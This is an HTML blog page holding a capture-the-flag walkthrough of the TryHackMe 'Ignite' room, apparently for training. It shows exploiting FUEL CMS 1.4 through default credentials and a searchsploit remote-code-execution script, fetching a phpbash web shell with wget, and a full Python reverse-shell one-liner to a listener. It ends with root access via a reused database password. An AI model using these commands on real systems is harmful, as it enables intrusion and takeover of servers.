<!DOCTYPE html>
<html>

    <head><script src="/livereload.js?mindelay=10&amp;v=2&amp;port=1313&amp;path=livereload" data-no-instant defer></script>
        <title> [ TryHackMe ] Ignite &middot; user@james ~ $ </title>
        <meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1">
<meta name="generator" content="Hugo 0.90.0" />




<script src="https://code.jquery.com/jquery-3.1.1.min.js"   integrity="sha256-hVVnYaiADRTO2PzUGmuLJr8BLUSjGIZsDYGmIJLv2b8="   crossorigin="anonymous"></script>


<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">

<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>


<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.2/css/all.css" integrity="sha384-fnmOCqbTlWIlj8LyTjo7mOUStjsKC4pOpQbqyi7RrhN7udi9RwhKkMHpvLbHG9Sr" crossorigin="anonymous">


<link rel="stylesheet" href="http://localhost:1313/css/nix.css">


<link rel="stylesheet" href="http://localhost:1313/css/styles.css">


<script src=http://localhost:1313/js/lunr-search.js></script>
<script src=http://localhost:1313/js/lunr.js></script>



<link rel="shortcut icon" href="http://localhost:1313/favicon.ico">



<link href="https://fonts.googleapis.com/css?family=Inconsolata%7COpen+Sans%7CConcert+One" rel="stylesheet">




<script async src="https://www.googletagmanager.com/gtag/js?id=G-4T1FV3DWGP"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-4T1FV3DWGP');
</script>



<script type="application/ld+json">
    {
        "@context" : "http://schema.org",
        "@type" : "BlogPosting",
        "mainEntityOfPage": {
             "@type": "WebPage",
             "@id": "http:\/\/localhost:1313\/"
        },
        "articleSection" : "articles",
        "name" : "[ TryHackMe ] Ignite",
        "headline" : "[ TryHackMe ] Ignite",
        "description" : "Tools and Commands  nmap searchsploit python netcat  Recon Start with an nmap scan: $ sudo nmap -A -oA nmap 10.10.194.158\nThe only open port is 80, a Apache\/2.4.18 web server. View the web page in a browser and we find it\u0026rsquo;s the default page for FUEL CMS 1.4, which also gives us some basic info about the CMS.\nA quick Gobuster scan gives us nothing particularly useful: $ gobuster dir -u http:\/\/10.",
        "inLanguage" : "en-US",
        "author" : "",
        "creator" : "",
        "publisher": "",
        "accountablePerson" : "",
        "copyrightHolder" : "",
        "copyrightYear" : "2021",
        "datePublished": "2021-01-03 00:00:00 \u002b0000 UTC",
        "dateModified" : "2021-01-03 00:00:00 \u002b0000 UTC",
        "url" : "http:\/\/localhost:1313\/articles\/offensive-security\/thm-ignite\/",
        "wordCount" : "608",
        "keywords" : [ "Blog" ]
    }
</script>
    </head>

    <body>
        <header>
<nav class="navbar navbar-default navbar-fixed-top navbar-inverse font-header">
	<div class="container-fluid">
		<div class="navbar-header">
			<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar-collapse-1" aria-expanded="false">
				<span class="sr-only">Toggle navigation</span>
				<span class="icon-bar"></span>
				<span class="icon-bar"></span>
				<span class="icon-bar"></span>
			</button>
      <a class="navbar-brand" id="green-terminal" href='http://localhost:1313/'>
        @james ~ $
      </a>
		</div>

		
		<div class="collapse navbar-collapse" id="navbar-collapse-1">
			<ul class="nav navbar-nav navbar-right">
				<li>
					<a href='http://localhost:1313/'>/home/</a>
        </li>
        
				
				
				<li class="dropdown">
                    
            		<a href="http://localhost:1313/about">~/about</a>
            		
        		</li>
        		
				
				<li class="dropdown">
                    
            		<a href="http://localhost:1313/achievements">~/achievements</a>
            		
        		</li>
        		
				
				<li class="dropdown">
                    
                        <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">articles <span class="caret"></span></a>
                    <ul class="dropdown-menu">
                        
                    		<li>
                    		<a href="http://localhost:1313/articles/digital-forensics">~/digital-forensics</a>
				    		</li>
                		
                    		<li>
                    		<a href="http://localhost:1313/articles/offensive-security">~/offensive-security</a>
				    		</li>
                		
                    		<li>
                    		<a href="http://localhost:1313/articles/operational-technology">~/operational-technology</a>
				    		</li>
                		
                    		<li>
                    		<a href="http://localhost:1313/articles/reviews">~/reviews</a>
				    		</li>
                		
                    		<li>
                    		<a href="http://localhost:1313/articles/security-operations">~/security-operations</a>
				    		</li>
                		
            		</ul>
            		
        		</li>
        		
				
				<li class="dropdown">
                    
            		<a href="http://localhost:1313/notes">~/notes</a>
            		
        		</li>
        		
				
				<li class="dropdown">
                    
                        <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">projects <span class="caret"></span></a>
                    <ul class="dropdown-menu">
                        
                    		<li>
                    		<a href="http://localhost:1313/projects/arduino">~/arduino</a>
				    		</li>
                		
                    		<li>
                    		<a href="http://localhost:1313/projects/bash">~/bash</a>
				    		</li>
                		
                    		<li>
                    		<a href="http://localhost:1313/projects/python">~/python</a>
				    		</li>
                		
            		</ul>
            		
        		</li>
        		
				
				<li class="dropdown">
                    
            		<a href="http://localhost:1313/search">~/search</a>
            		
        		</li>
        		

			</ul>
		</div>
	</div>
</nav>
</header>

        <div class="flex-wrapper">
            <div class="container wrapper single">
                <ol class="breadcrumb">
  
  
    
  
    
  
    
  
  <li>
    
      <a href="/">james</a>
    
  </li>

  
  <li>
    
      <a href="/articles/">articles</a>
    
  </li>

  
  <li>
    
      <a href="/articles/offensive-security/">offensive security</a>
    
  </li>

  
  <li>
    
      [ TryHackMe ] Ignite
    
  </li>

</ol>



                <h1><a href="http://localhost:1313/articles/offensive-security/thm-ignite/">[ TryHackMe ] Ignite</a></h1>
                <span class="post-date">2021-01-03 </span>
                <div class="post-content">
                    <h2 id="tools-and-commands">Tools and Commands</h2>
<ul>
<li>nmap</li>
<li>searchsploit</li>
<li>python</li>
<li>netcat</li>
</ul>
<h2 id="recon">Recon</h2>
<p>Start with an nmap scan: <code>$ sudo nmap -A -oA nmap 10.10.194.158</code></p>
<p>The only open port is 80, a Apache/2.4.18 web server. View the web page in a browser and we find it&rsquo;s the default page for FUEL CMS 1.4, which also gives us some basic info about the CMS.</p>
<p>A quick Gobuster scan gives us nothing particularly useful: <code>$ gobuster dir -u http://10.10.194.158 -w /usr/share/wordlists/dirb/common.txt</code></p>
<p>While Gobuster was running, read the CMS page. We find many config files are located in &ldquo;fuel/application/config/&rdquo; (such as database.php and config.php), and near the bottom it mentions a login page, /fuel, and gives default creds. Check the page and we can log in with them with full admin rights!</p>
<p>Browsing the Dashboard we find a few Upload areas. These could be promising.</p>
<h2 id="exploit-to-shell">Exploit to Shell</h2>
<p>Before going into that, start simply. Checking Searchsploit with <code>$ searchsploit fuel</code> gives us &ldquo;fuelCMS 1.4.1 - Remote Code Execution&rdquo;. Sounds good. Copy it to our working directory with <code>$ searchsploit -m linux/webapps/47138.py</code></p>
<p>Edit the file so the URL in the Python script matches the box script. You&rsquo;ll also need to make sure Burp Suite is open, and turn off Intercept; alternatively, remove the two references to the proxy in the script.</p>
<p>Then run the Python script (using Python 2, as the script is incompatible with Python 3 - <code>$ python 47138.py</code>). You&rsquo;ll be presented with a <code>cmd:</code> prompt. Try some things, such as <code>cmd:ls</code> and <code>cmd:whoami</code> to determine you&rsquo;re in - note you&rsquo;ll have to scroll up past the rubbish to get the actual result.</p>
<h2 id="upgrade-the-shell">Upgrade the Shell</h2>
<p>This shell is horrible, though, so let&rsquo;s try and upgrade it. There is a browser-based php shell called phpbash, available at <a href="https://github.com/Arrexel/phpbash/blob/master/phpbash.php" target="_blank">https://github.com/Arrexel/phpbash/blob/master/phpbash.php</a>. Download the raw script to your machine with <code>wget</code>, set up a local server with <code>$ python3 -m http.server 4444</code>, then download the file to the remote machine using <code>cmd:wget &lt;your-THM-IP&gt;:4444/phpbash.php</code>. Then, in a browser, visit http://10.10.194.158/phpbash.php and you get a better shell.</p>
<p>We can further improve the shell by making it a Python one, using a script from <a href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#python" target="_blank">https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Reverse Shell Cheatsheet.md#python</a>. Change the script to include your IP, set up a netcat listener on your machine on port 4242 with <code>$ nc -lvnp 4242</code>, and when you run it (in the phpbash shell - it won&rsquo;t work in the <code>cmd</code> one) your netcat will give you a shell.</p>
<p>This is the Python reverse shell code: <code>www-data@ubuntu:/var/www/html#:python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;10.8.83.23&quot;,4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(&quot;/bin/bash&quot;)'</code></p>
<p>This shell can be further upgraded, first by running <code>$ python3 -c 'import pty;pty.spawn(&quot;/bin/bash&quot;)'</code>, then <code>$ export TERM=xterm</code>, backgrounding this shell with Ctrl-Z, then <code>$ stty raw -echo; fg</code>. This gives us a nice, stable, interactive shell :)</p>
<h2 id="get-the-user-flag">Get the user flag</h2>
<p>Now we can get the first flag with <code>www-data@ubuntu:/var/www/html$ cat /home/www-data/flag.txt</code>. However, access to root (<code>$ ls /root</code>) is unsurprisingly denied.</p>
<h2 id="privesc">PrivEsc</h2>
<p>We&rsquo;ll need to privesc. <code>$ sudo -l</code> and <code>$ sudo -i</code> gives us nothing, and there are no SUIDs found with <code>$ find / -perm -u=s -type f 2&gt;/dev/null</code></p>
<p>Let&rsquo;s check the config files earlier, especially as one of them mentioned usernames and passwords. Change directory with <code>$ cd fuel/application/config</code>, and then search all the files for the phrase &ldquo;password&rdquo; using grep: <code>$ grep -ni password *</code>.</p>
<p>One result looks interesting, line 80 of &ldquo;database.php&rdquo;: <code>database.php:80: 'password' =&gt; 'mememe',</code>.</p>
<p><code>$ cat database.php</code> and have a read about line 80 - it suggests the password is for root!</p>
<p>Try it with <code>$ su root</code> and the password, and success! We get a <code>#</code> shell, and <code># whoami</code> confirms we&rsquo;re root.</p>
<h2 id="get-the-root-flag">Get the root flag</h2>
<p>Now simply <code># cat /root/root.txt</code>.</p>

                </div>
                
                <div class="post-comments">
                    
                </div>
                
            </div>
            <footer class="footer text-center">
<p>Copyright &copy; 2022 James -
<span class="credit">
	Powered by
	<a target="_blank" href="https://gohugo.io">Hugo</a>
	and
	<a target="_blank" href="https://github.com/LordMathis/hugo-theme-nix/">Nix</a> theme.
</span>
</p>
</footer>

        </div>
    </body>
